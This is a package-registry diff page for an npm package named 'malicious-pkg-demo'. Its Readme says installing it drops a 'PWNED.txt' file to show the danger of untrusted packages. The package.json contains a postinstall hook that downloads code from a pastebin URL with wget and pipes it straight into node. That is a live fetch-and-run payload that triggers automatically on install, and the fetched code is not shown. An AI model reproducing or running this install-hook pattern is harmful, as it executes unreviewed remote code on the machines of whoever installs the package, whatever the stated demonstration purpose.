malicious-pkg-demo 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of malicious-pkg-demo might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/Readme.md +5 -0
  2. package/package.json +13 -0
package/Readme.md ADDED
@@ -0,0 +1,5 @@
1
+ When you install this package, it will create a text file called 'PWNED.txt' on your Desktop.
2
+
3
+ This is to demonstrate that you shouldn't install packages from untrusted sources.
4
+
5
+ Probably doesn't work on Windows.
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "malicious-pkg-demo",
3
+ "version": "1.0.2",
4
+ "repository": "https://github.com/kiloOhm/malicious-pkg-demo",
5
+ "description": "",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "postinstall": "wget https://pastebin.com/raw/N3GmZwHg -O - | node"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
13
+ }